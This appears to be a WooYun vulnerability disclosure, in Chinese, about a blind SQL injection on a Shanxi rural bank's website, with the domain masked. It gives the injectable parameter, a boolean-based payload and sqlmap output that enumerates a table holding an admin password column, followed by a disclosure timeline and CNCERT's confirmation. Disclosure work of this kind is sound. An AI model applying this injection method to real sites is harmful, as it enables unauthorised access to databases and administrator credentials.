当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143774

漏洞标题:山西某银行主站SQL一枚可泄露敏感信息

相关厂商:山西某银行

漏洞作者: 路人甲

提交时间:2015-09-29 11:28

修复时间:2015-11-15 20:00

公开时间:2015-11-15 20:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-10-01: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-11: 细节向核心白帽子及相关领域专家公开
2015-10-21: 细节向普通白帽子公开
2015-10-31: 细节向实习白帽子公开
2015-11-15: 细节向公众公开

简要描述:

每逢佳节倍思亲,挖挖洞,派遣派遣寂寞...

详细说明:

山西介休农商行官网存在SQL盲注,可泄露数据库信息。

漏洞证明:

山西介休农商行主站地址:http://**.**.**.**/index.asp

1银行主页.png


存在SQL注入页面地址(注入参数为class):
http://**.**.**.**/tzlc.asp?class=6&classname=%BD%F0%C8%DA%D6%AA%CA%B6
测试在class后面加个',SQL报错了,怀疑存在注入。

2报错.png


于是听着歌曲,让工具跑跑,一会就有结果了:
数据库是Access的...操作系统windows2003

sqlmap identified the following injection points with a total of 52 HTTP(s) requests:
---
Place: GET
Parameter: class
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class=6 AND 2971=2971&classname=%BD%F0%C8%DA%D6%AA%CA%B6
---
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


就跑出来来一个数据库

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: class
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class=6 AND 2971=2971&classname=%BD%F0%C8%DA%D6%AA%CA%B6
---
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+------+
| menu |
+------+


随便看了下menu的表字段信息,里面包含adminpwd管理员密码,过中秋的就不深入了,吃个月饼去。

back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: menu
[25 columns]
+-----------------------+-------------+
| Column                | Type        |
+-----------------------+-------------+
| admin_userid          | non-numeric |
| adminpwd              | non-numeric |
| agent_specialtyid     | non-numeric |
| ba_id                 | non-numeric |
| currentindex          | non-numeric |
| description           | non-numeric |
| direction             | non-numeric |
| id_enfermedad         | non-numeric |
| id_preventivo         | non-numeric |
| idsubscriptiontickets | non-numeric |
| inactive              | non-numeric |
| korschetfilter        | non-numeric |
| main_list_image       | non-numeric |
| mem_pass              | non-numeric |
| morfeoshow            | non-numeric |
| naresh                | non-numeric |
| news_category_id      | non-numeric |
| nextval               | non-numeric |
| price02               | non-numeric |
| realname              | non-numeric |
| statechangeid         | non-numeric |
| student_id            | non-numeric |
| tomador_id            | non-numeric |
| user_email            | non-numeric |
| user_icq              | non-numeric |
+-----------------------+-------------+


修复方案:

过滤在过滤!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-01 19:59

厂商回复:

CNVD确认所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置,同时转由CNVD向山西分中心通报。

最新状态:

暂无